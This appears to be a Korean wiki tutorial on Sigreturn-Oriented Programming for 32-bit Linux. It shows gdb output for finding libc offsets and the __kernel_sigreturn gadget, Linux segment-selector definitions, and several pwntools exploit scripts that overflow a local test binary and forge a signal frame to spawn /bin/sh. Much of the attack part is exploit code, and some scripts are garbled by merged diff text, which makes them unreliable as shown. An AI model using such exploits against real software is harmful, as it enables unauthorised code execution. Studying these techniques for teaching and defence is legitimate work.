...
Code Block | ||
---|---|---|
| ||
gdb-peda$ vmmap Start End Perm Name ... 0xf7e00000 0xf7fad000 r-xp /lib32/libc-2.23.so 0xf7fad000 0xf7fae000 ---p /lib32/libc-2.23.so 0xf7fae000 0xf7fb0000 r--p /lib32/libc-2.23.so 0xf7fb0000 0xf7fb1000 rw-p /lib32/libc-2.23.so ... gdb-peda$ p/x 0xf7e49020 - 0xf7e00000 $2 = 0x49020 gdb-peda$ p __kernel_sigreturn $3 = {<text variable, no debug info>} 0xf7fd8de0 <__kernel_sigreturn> gdb-peda$ p/x 0xf7fd8de0 - 0xf7e00000 $4 = 0x1d8de0 gdb-peda$ find "/bin/sh" Searching for '/bin/sh' in: None ranges Found 1 results, display max 1 items: libc : 0xf7f5902b ("/bin/sh") gdb-peda$ p/x 0xf7f5902b - 0xf7e00000 $5 = 0x15902b gdb-peda$ |
Find Gadgets
- 기본적으로 다음과 같이 해당 Memory Map에서 필요한 Gadgets을 찾을 수 있습니다.
Offset of __kernel_sigreturn
- 다음과 같이 __kernel_sigreturn() 함수를 Exploit에 사용할 수 있습니다.
- 0xf7fd8de0 주소를 사용할 경우 "pop eax" 명령어가 포함되어 있기 때문에 0xf7fd8de0 호출 뒤에 임의의 값(4bit)이 저장되어야 합니다.
- Ex) __kernel_sigreturn() + 임의의 값(4bit) + sigcontext 구조체
0xf7fd8de1 주소를 사용할 경우 "mov eax,0x77" 명령어가 실행되기 때문에 0xf7fd8de1 호출 뒤에 sigcontext 구조체가 저장되어야 합니다.
- Ex) __kernel_sigreturn() + sigcontext 구조체
- 0xf7fd8de0 주소를 사용할 경우 "pop eax" 명령어가 포함되어 있기 때문에 0xf7fd8de0 호출 뒤에 임의의 값(4bit)이 저장되어야 합니다.
Code Block | ||
---|---|---|
| ||
gdb-peda$ x/3i 0xf7fd8de0
=> 0xf7fd8de0 <__kernel_sigreturn>: pop eax
0xf7fd8de1 <__kernel_sigreturn+1>: mov eax,0x77
0xf7fd8de6 <__kernel_sigreturn+6>: int 0x80
gdb-peda$ |
Find Gadgets
- 기본적으로 다음과 같이 해당 Memory Map에서 필요한 Gadgets을 찾을 수 있습니다.
Panel | |||||||||||||||||||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| |||||||||||||||||||||||||||||||||||||||||||||||||
| |||||||||||||||||||||||||||||||||||||||||||||||||
Panel | |||||||||||||||||||||||||||||||||||||||||||||||||
| |||||||||||||||||||||||||||||||||||||||||||||||||
|
- 테스트 프로그램이 32bit이기 때문에 sigreturn() 함수를 vdso 영역에서 확인 할 수 있습니다.
...
SROP의 Exploit code를 작성할 때 중요한 부분이 있습니다.
sigcontext 구조체 형태로 stack에 값을 저장할 때 최소한 CS, SS레지스터에 대한 값을 설정해야합니다.
Linux kernel에는 4개의 세그먼트만 존재합니다.
- 공격 코드들은 User Mode에서 실행되기 때문에 0x23, 0x2b가 User Code, User Data / Stack 값을 사용해야 합니다.
- 그리고 32bit 프로그램의 경우 실행되는 운영체제(32bit / 64bit) 환경에 따라 사용되는 세그먼트 값이 다릅니다.
- 32bit 운영체제에서는 0x73, 0x7b가 사용횝니다.
- 62bit 운영체제에서는 실행되는 32bit 프로그램의 경우 0x23, 0x2b가 사용됩니다.
이외의 값을 저장하게 되면 에러가 발생하게됩니다.
Panel | |||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| |||||||||||||||
| |||||||||||||||
Code Block | ||||||
---|---|---|---|---|---|---|
| 17-rc6
| h#L203
Exploit code
- 다음과 같이 Exploit code를 작성 할 수 있습니다.
| |
#ifdef CONFIG_X86_32
...
#define GDT_ENTRY_TLS_MIN 6
#define GDT_ENTRY_TLS_MAX (GDT_ENTRY_TLS_MIN + GDT_ENTRY_TLS_ENTRIES - 1)
#define GDT_ENTRY_KERNEL_CS 12
#define GDT_ENTRY_KERNEL_DS 13
#define GDT_ENTRY_DEFAULT_USER_CS 14
#define GDT_ENTRY_DEFAULT_USER_DS 15
#define GDT_ENTRY_TSS 16
#define GDT_ENTRY_LDT 17
#define GDT_ENTRY_PNPBIOS_CS32 18
#define GDT_ENTRY_PNPBIOS_CS16 19
#define GDT_ENTRY_PNPBIOS_DS 20
#define GDT_ENTRY_PNPBIOS_TS1 21
#define GDT_ENTRY_PNPBIOS_TS2 22
#define GDT_ENTRY_APMBIOS_BASE 23
#define GDT_ENTRY_ESPFIX_SS 26
#define GDT_ENTRY_PERCPU 27
#define GDT_ENTRY_STACK_CANARY 28
#define GDT_ENTRY_DOUBLEFAULT_TSS 31
/*
* Number of entries in the GDT table:
*/
#define GDT_ENTRIES 32
/*
* Segment selector values corresponding to the above entries:
*/
#define __KERNEL_CS (GDT_ENTRY_KERNEL_CS*8)
#define __KERNEL_DS (GDT_ENTRY_KERNEL_DS*8)
#define __USER_DS (GDT_ENTRY_DEFAULT_USER_DS*8 + 3)
#define __USER_CS (GDT_ENTRY_DEFAULT_USER_CS*8 + 3)
#define __ESPFIX_SS (GDT_ENTRY_ESPFIX_SS*8) |
Code Block | ||||||||
---|---|---|---|---|---|---|---|---|
| ||||||||
#else /* 64-bit: */
#include <asm/cache.h>
#define GDT_ENTRY_KERNEL32_CS 1
#define GDT_ENTRY_KERNEL_CS 2
#define GDT_ENTRY_KERNEL_DS 3
/*
* We cannot use the same code segment descriptor for user and kernel mode,
* not even in long flat mode, because of different DPL.
*
* GDT layout to get 64-bit SYSCALL/SYSRET support right. SYSRET hardcodes
* selectors:
*
* if returning to 32-bit userspace: cs = STAR.SYSRET_CS,
* if returning to 64-bit userspace: cs = STAR.SYSRET_CS+16,
*
* ss = STAR.SYSRET_CS+8 (in either case)
*
* thus USER_DS should be between 32-bit and 64-bit code selectors:
*/
#define GDT_ENTRY_DEFAULT_USER32_CS 4
#define GDT_ENTRY_DEFAULT_USER_DS 5
#define GDT_ENTRY_DEFAULT_USER_CS 6
/* Needs two entries */
#define GDT_ENTRY_TSS 8
/* Needs two entries */
#define GDT_ENTRY_LDT 10
#define GDT_ENTRY_TLS_MIN 12
#define GDT_ENTRY_TLS_MAX 14
/* Abused to load per CPU data from limit */
#define GDT_ENTRY_PER_CPU 15
/*
* Number of entries in the GDT table:
*/
#define GDT_ENTRIES 16
/*
* Segment selector values corresponding to the above entries:
*
* Note, selectors also need to have a correct RPL,
* expressed with the +3 value for user-space selectors:
*/
#define __KERNEL32_CS (GDT_ENTRY_KERNEL32_CS*8)
#define __KERNEL_CS (GDT_ENTRY_KERNEL_CS*8)
#define __KERNEL_DS (GDT_ENTRY_KERNEL_DS*8)
#define __USER32_CS (GDT_ENTRY_DEFAULT_USER32_CS*8 + 3)
#define __USER_DS (GDT_ENTRY_DEFAULT_USER_DS*8 + 3)
#define __USER32_DS __USER_DS
#define __USER_CS (GDT_ENTRY_DEFAULT_USER_CS*8 + 3)
#define __PER_CPU_SEG (GDT_ENTRY_PER_CPU*8 + 3)
/* TLS indexes for 64-bit - hardcoded in arch_prctl(): */
#define FS_TLS 0
#define GS_TLS 1
#define GS_TLS_SEL ((GDT_ENTRY_TLS_MIN+GS_TLS)*8 + 3)
#define FS_TLS_SEL ((GDT_ENTRY_TLS_MIN+FS_TLS)*8 + 3)
#endif |
Info |
---|
Exploit code
- 다음과 같이 Exploit code를 작성 할 수 있습니다.
Code Block | ||||
---|---|---|---|---|
| ||||
from pwn import *
binary = ELF('./srop32')
p = process(binary.path)
p.recvuntil('Printf() address : ')
stackAddr = p.recvuntil('\n')
stackAddr = int(stackAddr,16)
#You need to change the value to match the environment you are testing.
libcBase = stackAddr - 0x49020
syscall = libcBase + 0x1d5de6
binsh = libcBase + 0x15902b
ksigreturn = libcBase + 0x1d5de0
print 'The base address of Libc : ' + hex(libcBase)
print 'Address of syscall gadget : ' + hex(syscall)
print 'Address of string "/bin/sh" : ' + hex(binsh)
print 'Address of sigreturn() : ' + hex(ksigreturn)
exploit = ''
exploit += "\x90" * 66
exploit += p32(ksigreturn)
exploit += p32(0x0)
exploit += p32(0x0) #GS
exploit += p32(0x0) #FS
exploit += p32(0x0) #ES
exploit += p32(0x0) #DS
exploit += p32(0x0) #EDI | ||||
Code Block | ||||
| ||||
from pwn import * binary = ELF('./srop') p = process(binary.path) p.recvuntil('Printf() address : ') stackAddr = p.recvuntil('\n') stackAddr = int(stackAddr,16) libcBase = stackAddr - 0x49020 ksigreturn = libcBase + 0x1d5de1 syscall = libcBase + 0x1d5de6 binsh = libcBase + 0x15902b print hex(libcBase) print hex(sigreturn) print hex(binsh) print hex(syscall) exploit = '' exploit += "\x90" * 66 exploit += p32(ksigreturn) exploit += p32(0x0) #GS #ESI exploit += p32(0x0) #FS #EBP exploit += p32(0x0) #ESsyscall) #ESP exploit += p32(0x0) #DS binsh) #EBX exploit += p32(0x0) #EDI #EDX exploit += p32(0x0) #ESI #ECX exploit += p32(0x0) #EBP0xb) #EAX exploit += p32(syscall) #ESP0x0) #trapno exploit += p32(binsh) #EBX0x0) #err exploit += p32(0x0) #EDX exploit += p32(0x0) #ECXsyscall) #EIP #Runed a 32bit program in the 64bit operation system. exploit += p32(0xb) #EAX0x23) #CS exploit += p32(0x0) #trapno #eflags exploit += p32(0x0) #err #esp_atsignal exploit += p32(syscall) #EIP exploit0x2b) #SS #Runed a 32bit program in the 32bit operation system. #exploit += p32(0x23) 0x73) #CS exploit#exploit += p32(0x0) #eflags exploit#exploit += p32(0x0) #esp_atsignal exploit#exploit += p32(0x2b) 0x7b) #SS p.send(exploit) p.interactive() |
...
Code Block | ||||
---|---|---|---|---|
| ||||
from pwn import * binary = ELF('./sropsrop32') p = process(binary.path) p.recvuntil('Printf() address : ') stackAddr = p.recvuntil('\n') stackAddr = int(stackAddr,16) #You need to change the value to match the environment you are testing. libcBase = stackAddr - 0x49020 ksigreturn = libcBase + 0x1d5de10x1d5de0 syscall = libcBase + 0x1d5de6 binsh = libcBase + 0x15902b print 'The base address of Libc : ' + hex(libcBase) print 'Address of syscall gadget : ' + hex(libcBasesyscall) print 'Address of string "/bin/sh" : ' + hex(sigreturn) print hex(binsh) printbinsh) print 'Address of sigreturn() : ' + hex(syscallksigreturn) exploit = '' exploit += "\x90" * 66 exploit += p32(ksigreturn) #ret exploit += p32(0x0) #Runed a 32bit program in the 64bit operation system. frame = SigreturnFrame(kernel='amd64') #Runed a 32bit program in the 32bit operation system. #frame = SigreturnFrame(kernel='i386') frame.eax = constants.SYS_execve0xb frame.ebx = binsh frame.esp = syscall frame.eip = syscall exploit += str(frame) p.send(exploit) p.interactive() |
...
- http://egloos.zum.com/studyfoss/v/5182475
- http://docs.pwntools.com/en/stable/rop/srop.html
- http://www.freebuf.com/articles/network/87447.html
- http://blog.leanote.com/post/3191220142@qq.com/SROP
- http://blackbunny.io/x64-sigreturn-oriented-programming/
- https://en.wikipedia.org/wiki/Sigreturn-oriented_programming
- https://books.google.co.jp/books?id=h0lltXyJ8aIC&dq=setup_frame&hl=ko&source=gbs_navlinks_s
- https://thisissecurity.stormshield.com/2015/01/03/playing-with-signals-an-overview-on-sigreturn-oriented-programming/
Comments
Panel |
---|